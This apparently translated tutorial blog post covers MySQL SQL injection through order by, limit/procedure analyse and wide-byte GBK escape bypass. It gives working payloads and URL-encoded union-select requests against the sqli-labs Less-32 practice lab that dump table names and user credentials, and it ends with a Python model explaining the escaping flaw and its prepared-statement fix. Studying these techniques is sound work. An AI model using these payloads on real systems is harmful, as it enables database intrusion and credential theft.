SQL injection base - order by injection, limit, wide byte
2022-08-10 23:49:00 【Hold the kitten】
Contents
order by injection
limit injection
Wide-byte injection
order by
(1) Why order by injection exists
In MySQL, the order by clause can be used to guess the number of columns in a table, then combined with a union select statement to echo data.
However, when the page shows MySQL error messages and the parameter following order by is user-controllable, the error message itself can be used for injection.
(2) Case 1: injection with an error-reporting function
select * from users order by updatexml(1,if(1=2,1,concat(0x7e,database(),0x7e)),1);
(3) Case 2: injection with a delay function
select * from users order by if(concat(0x7e,user(),0x7e),1,sleep(3));
The delay is not 3 seconds: it is the number of rows queried × 3 = total delay time.
When the SQL condition is true there is a delay; when it is false the page is displayed in the normal time.
(4) Case 3: blind injection with rand()
The random number generated by rand() lies between 0 and 1, but when rand() is given a parameter, that parameter becomes the seed, and the random numbers generated from that seed are fixed.
We find that the result ordering differs when the rand() parameter is 0 versus 1, so we test again using Boolean blind injection:
select * from users order by rand(ascii(mid((select database()),1,1))=8);
(5) Case 4: blind injection with if
When the if condition is true the output order is scrambled; when it is false the output order does not change.
limit injection
(1) Introduction to limit
limit [offset,] row_count: the offset is the position from which MySQL's query analyser starts returning rows, and row_count is the number of records returned.
Basic usage: select * from users limit 1,4;
Two things can follow limit: procedure and into. into requires the privilege to write a shell to disk; otherwise it cannot be used, so procedure is where we look for an opening.
The benchmark function takes two parameters: the first is the number of executions, the second is the function or expression to test.
For example: benchmark(10000000, function(1))
This executes the expression 10000000 times; the increased amount of computation in MySQL causes a delay, similar to a multi-table join / Cartesian product.
(2) Case
select * from users limit 1 procedure analyse(extractvalue(rand(),concat(0x3a,benchmark(10000000,user()))),1);
Wide-byte injection
(1) What is a wide byte?
A wide-byte character is two bytes in size; GB2312, GBK, GB18030, BIG5, Shift_JIS and similar encodings are what is commonly meant by "wide byte". Note that by default an English character occupies one byte and a Chinese character two bytes.
(2) Common escape functions in wide-byte injection
addslashes(): returns a string with backslashes added before predefined characters
mysql_real_escape_string(): escapes special characters in a string for use in an SQL statement
mysql_escape_string(): escapes a string
(3) Case: sqli-labs Less-32
We can see that the single quote is escaped; look at the source.
We append %df after the 1.
1. Why does adding %df let the single quote escape?
This comes from a MySQL characteristic: because GBK is a multibyte encoding, MySQL treats two bytes as one Chinese character, so %df together with the following \ (i.e. %5c) becomes the single character "運", and the single quote escapes.
2. But how does MySQL decide whether a byte is a normal character or part of a Chinese character?
According to GBK encoding, if the first byte's ASCII value is greater than 128 it can basically be judged as a lead byte. For example, we can replace %df with %a1.
This way, once the single quote has escaped, we can query the data in the database.
1. Get the tables in the database
http://127.0.0.1/sqli/Less-32/?id=-1%a1%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+
2. Get the columns of the users table
http://127.0.0.1/sqli/Less-32/?id=-1%df%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273)--+
3. Get usernames and passwords
http://127.0.0.1/sqli/Less-32/?id=-1%df%27%20union%20select%201,2,(select%20group_concat(username,password)%20from%20security.users)--+
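The %df mechanism explained in this case, as an added example that is not code from the original post: a Python model of byte-wise addslashes() escaping beside the charset-aware rule MySQL's own escape routine applies for multibyte charsets (a valid two-byte character is copied whole, a lone lead byte is escaped itself), plus a small GBK lexer model that counts the quotes left as string delimiters. The GBK byte ranges and the lexer rule are assumptions about MySQL's behaviour, not the post's text.

```python
# Added example, not from the original post: a byte-wise escape such as PHP
# addslashes() versus the rule MySQL's charset-aware escape applies under GBK
# (copy a valid two-byte character whole, escape a lone lead byte). GBK byte
# ranges below are assumed; the functions model MySQL, they are not MySQL code.

def is_gbk_pair(lead: int, trail: int) -> bool:
    """True if the two bytes form one valid GBK double-byte character."""
    return 0x81 <= lead <= 0xFE and (0x40 <= trail <= 0x7E or 0x80 <= trail <= 0xFE)

def php_addslashes(raw: bytes) -> bytes:
    """Byte-wise escaping with no charset knowledge, as addslashes() does."""
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C):          # ' " \
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def gbk_aware_escape(raw: bytes) -> bytes:
    """As mysql_real_escape_string() after mysql_set_charset('gbk'): a valid pair
    passes untouched; a lead byte with no valid trail byte is itself escaped."""
    out, i = bytearray(), 0
    while i < len(raw):
        b = raw[i]
        if i + 1 < len(raw) and is_gbk_pair(b, raw[i + 1]):
            out += raw[i:i + 2]              # whole character, copy as-is
            i += 2
        else:
            if 0x81 <= b <= 0xFE or b in (0x27, 0x22, 0x5C):
                out.append(0x5C)             # lone lead byte or quote: prefix \
            out.append(b)
            i += 1
    return bytes(out)

def unescaped_quotes(sql: bytes) -> int:
    """Quotes the server takes as delimiters lexing GBK: pair = one char, \\ eats one byte."""
    n, i = 0, 0
    while i < len(sql):
        if i + 1 < len(sql) and is_gbk_pair(sql[i], sql[i + 1]):
            i += 2
        elif sql[i] == 0x5C:
            i += 2
        else:
            n += sql[i] == 0x27
            i += 1
    return n

def compare(raw: bytes = b"1\xdf'") -> dict:
    """Per scheme: escaped bytes and delimiter-quote count (default: constructed 1%df' input)."""
    a, g = php_addslashes(raw), gbk_aware_escape(raw)
    return {"addslashes": (a, unescaped_quotes(a)), "gbk_aware": (g, unescaped_quotes(g))}
```

compare() shows addslashes() leaving one live delimiter quote (0xDF 0x5C became "運") while the charset-aware escape leaves none; server-side prepared statements avoid the issue entirely, since the value never travels inside the statement text.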